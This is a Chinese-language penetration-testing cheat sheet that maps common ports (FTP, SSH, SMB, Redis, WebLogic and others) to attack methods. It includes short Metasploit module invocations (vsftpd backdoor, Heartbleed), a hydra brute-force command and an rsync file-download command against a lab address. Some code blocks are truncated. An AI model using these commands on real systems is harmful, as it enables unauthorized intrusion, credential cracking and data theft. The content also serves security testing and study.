常见端口和服务
端口 | 说明 | 攻击方法 |
---|---|---|
21 | FTP-文件传输协议 | 弱口令、爆破、嗅探、后门 |
22 | ssh-安全隧道远程登陆 | 弱口令、爆破 |
23 | telnet-远程连接 | 弱口令、爆破、嗅探 |
25 | smtp-简单邮件传输协议 | 邮件伪造 |
53 | domain-DNS域名解析服务 | DNS劫持、缓存投毒 |
80/443 | http服务 | 常见Web漏洞、IIS写文件、OpenSSL |
139 | Samba服务 | 爆破、远程代码执行 |
445 | 局域网共享 | ms-17010漏洞(Win7及之前版本) |
873 | Rsync | 远程代码执行 |
1433 | MSSQL数据库 | 爆破、SQL注入 |
2049 | NFS | 未授权访问 |
3306 | MySQL数据库 | 爆破、SQL注入 |
3389 | rdp-远程桌面连接 | 爆破、漏洞ms12-020等 |
5432 | postgresql | 爆破、注入 |
5632 | Pcanywhere | 拒绝服务等漏洞、爆破 |
5900 | VNC远程登陆 | 爆破、认证绕过 |
6379 | Redis | 未授权访问 |
7001/7002 | weblogic | Java反序列化漏洞 |
9990 | jboss | 远程代码执行、Java反序列化 |
攻击方向
21(FTP)
默认端口:20(数据端口);21(控制端口);69(tftp小型文件传输协议)
爆破:
1 | #anonymous匿名登陆 |
嗅探:
Ettercap(内网神器)
或msf模块
1 | use auxiliary/sniffer/psnuffle |
后门:
在特定版本的vsftpd服务器中,被人恶意植入代码,当用户名以”:)”为结尾
服务器就会在6200端口监听,并且能够执行任意代码(root)
1 | use exploit/unix/ftp/vsftpd_234_backdoor |
22(SSH)
爆破:
1 | #可以采用上边那种或以下这种写法 |
53(DNS)
内网使用Ettercap进行DNS劫持,钓鱼攻击
公网的话要能控制运营商网关
139(Smb)
爆破:
1 | hydra -l root -P top10000.txt 192.168.115.136 smb -v |
远程代码执行:
443(https)
检测:
1 | nmap -sV -p 8443 --script ssl-heartbleed 192.168.115.136 |
利用:
1 | use auxiliary/scanner/ssl/openssl_heartbleed |
873(Rsync)
未授权访问:
1 | rsync -avz ip::wwwroot/目录 /root/ #下载目标主机上的文件到本机root目录 |
2049(NFS)
列出导出文件夹:
1 | use auxiliary/scanner/nfs/nfsmount |
6379(Redis)
未授权访问:
1 | #没有密码,直接连接 |
7001/7002(weblogic)
反序列化:CVE-2017-3248